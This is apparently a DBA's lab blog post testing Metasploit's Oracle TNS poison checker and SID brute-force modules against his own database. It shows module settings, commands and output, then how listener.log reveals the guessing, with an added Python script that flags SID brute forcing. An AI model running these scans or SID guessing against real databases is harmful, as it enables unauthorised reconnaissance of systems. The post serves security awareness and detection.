Exploiting an Oracle database with Metasploit (Part 2)

Continuing from Exploiting an Oracle database with Metasploit (Part 1). Here’s the next set of Metasploit exploits and scanners I’ve tried and tested.

auxiliary/scanner/oracle/tnspoison_checker

This one just checks if your database is vulnerable to TNS poisoning:

msf auxiliary(tnspoison_checker) > info

Name: Oracle TNS Listener Checker
Module: auxiliary/scanner/oracle/tnspoison_checker
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2012-04-18

Provided by:
ir0njaw (Nikita Kelesis) <nikita.elkey@gmail.com>

Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOSTS   192.168.56.163   yes       The target address range or CIDR identifier
RPORT    1521             yes       The target port
THREADS  1                yes       The number of concurrent threads

Description:
This module checks the server for vulnerabilities like TNS Poison.
Module sends a server a packet with command to register new TNS
Listener and checks for a response indicating an error. If the
registration is errored, the target is not vulnearble. Otherwise,
the target is vulnerable to malicious registrations.

Yup, it’s vulnerable. But Metasploit doesn’t have the tools to exploit it. To be fair, you probably need to set up a listener of your own to do the exploit properly, so you would need Oracle database software on the Kali Linux box to make the exploit work.

auxiliary/admin/oracle/sid_brute

For this one you don’t need a connection to the database. It will only communicate with the listener, asking time and time again “do you have this instance? No? Do you have that instance? No?…” and so on.

msf auxiliary(win32exec) > use auxiliary/admin/oracle/sid_brute
msf auxiliary(sid_brute) > info

Name: Oracle TNS Listener SID Brute Forcer
Module: auxiliary/admin/oracle/sid_brute
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2009-01-07

Provided by:
MC <mc@metasploit.com>

Basic options:
Name     Current Setting                                         Required  Description
----     ---------------                                         --------  -----------
RHOST    192.168.56.163                                          yes       The target address
RPORT    1521                                                    yes       The target port
SIDFILE  /usr/share/metasploit-framework/data/wordlists/sid.txt  no        The file that contains a list of sids.
SLEEP    1                                                       no        Sleep() amount between each request.

Description:
This module simply attempts to discover the protected SID.

References:
https://www.metasploit.com/users/mc
http://www.red-database-security.com/scripts/sid.txt

The check comes with a list of 577 commonly used instance names, like ORCL, PROD, TEST, instance names set by certain software and variations on those themes. I had to add my instance name to make it come up with anything, because I didn’t have any instances with names in the default list.

msf auxiliary(sid_brute) > run

[*] Starting brute force on 192.168.56.163, using sids from /usr/share/metasploit-framework/data/wordlists/sid.txt...
[+] 192.168.56.163:1521 Found SID 'KNUTSEL'
[*] Done with brute force...
[*] Auxiliary module execution completed

If you want to demo this one, I would advise you to make your own SID list, because going through the default list will take ages. But make it long enough that you have time to visit the listener.log (in $ORACLE_BASE/diag/tnslsnr/<hostname>/listener/trace), because there you’ll see that this attack can actually be detected: every guess that misses leaves errors like these:

Wed Aug 19 21:19:33 2015
19-AUG-2015 21:19:33 * (CONNECT_DATA=(SID=ORADB3)(CID=(PROGRAM=)(HOST=MSF)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.162)(PORT=33181)) * establish * ORADB3 * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
19-AUG-2015 21:19:34 * (CONNECT_DATA=(SID=ORALIN)(CID=(PROGRAM=)(HOST=MSF)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.162)(PORT=58410)) * establish * ORALIN * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
19-AUG-2015 21:19:35 * (CONNECT_DATA=(SID=ORCL0)(CID=(PROGRAM=)(HOST=MSF)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.162)(PORT=59442)) * establish * ORCL0 * 12505
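A defender’s follow-up to the listener.log excerpt above, added here and not part of the original post: a small Python script that parses the “establish” entries, keeps the TNS-12505 rejections per client host, and flags any host that asks for several unknown SIDs inside one time window. The sample log text is constructed to mirror the entries quoted above; the threshold of three misses per 60 seconds is an assumption you would tune to your own environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample modelled on the listener.log entries quoted above; not a real capture.
SAMPLE_LOG = """\
19-AUG-2015 21:19:33 * (CONNECT_DATA=(SID=ORADB3)(CID=(PROGRAM=)(HOST=MSF)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.162)(PORT=33181)) * establish * ORADB3 * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
19-AUG-2015 21:19:34 * (CONNECT_DATA=(SID=ORALIN)(CID=(PROGRAM=)(HOST=MSF)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.162)(PORT=58410)) * establish * ORALIN * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
19-AUG-2015 21:19:35 * (CONNECT_DATA=(SID=ORCL0)(CID=(PROGRAM=)(HOST=MSF)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.162)(PORT=59442)) * establish * ORCL0 * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
19-AUG-2015 21:25:10 * (CONNECT_DATA=(SID=KNUTSL)(CID=(PROGRAM=sqlplus)(HOST=ws01)(USER=dba))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.10)(PORT=40111)) * establish * KNUTSL * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
"""

TS_RE = re.compile(r"^(\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* ")
SID_RE = re.compile(r"\(CONNECT_DATA=\((?:SID|SERVICE_NAME)=([^)]*)\)")
ADDR_RE = re.compile(r"\(ADDRESS=\(PROTOCOL=\w+\)\(HOST=([^)]+)\)\(PORT=\d+\)\)")  # client, not CID host
RC_RE = re.compile(r" \* establish \* \S+ \* (\d+)\s*$")

def parse_establish(line):
    """Return (timestamp, client_host, sid, return_code) for an 'establish' line, else None."""
    ts, sid, addr, rc = (r.search(line) for r in (TS_RE, SID_RE, ADDR_RE, RC_RE))
    if not (ts and sid and addr and rc):
        return None
    when = datetime.strptime(ts.group(1), "%d-%b-%Y %H:%M:%S")
    return when, addr.group(1), sid.group(1), int(rc.group(1))

def sid_guessers(log_text, threshold=3, window=timedelta(seconds=60)):
    """host -> sorted unknown SIDs, for hosts with >= threshold TNS-12505 hits in one window."""
    rejects = defaultdict(list)            # host -> [(time, sid), ...]
    for line in log_text.splitlines():
        rec = parse_establish(line)
        if rec and rec[3] == 12505:        # 12505: SID unknown to this listener
            rejects[rec[1]].append((rec[0], rec[2]))
    flagged = {}
    for host, events in rejects.items():
        events.sort()
        start = 0
        for end in range(len(events)):    # sliding window over this host's rejections
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[host] = sorted({sid for _, sid in events})
                break
    return flagged

if __name__ == "__main__":
    for host, sids in sid_guessers(SAMPLE_LOG).items():
        print(f"possible SID brute force from {host}: tried {', '.join(sids)}")
```

A single typo from a DBA (the 192.168.56.10 entry) stays below the threshold, while the three guesses in three seconds from 192.168.56.162 are flagged.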

I’m still testing some other exploits, but I have a feeling I’m missing some good scanners to fully utilize Metasploit. I’m thinking of writing my own stuff for Metasploit. For example, I’d like to see a scanner that tries to find usable database links.

The story continues, but I have a lot of other stuff to do. I’ll post info about it when I’m done.


About Marcel-Jan Krijgsman

Ever since I started working with Oracle, I had an interest in Oracle database performance tuning. This led, eventually, to a four-day training I made and gave for customers of Transfer Solutions. Since 2012 I have worked for Rabobank Nederland. A few years ago I also became interested in Oracle database security. All technology aside, it is my experience that security usually plays out on a political level. I'm an Oracle Certified Professional for the 8i, 9i, 10g and 11g databases and an Oracle Database 11g Performance Tuning Certified Expert.

This entry was posted in Hacking for better security awareness, Oracle security.
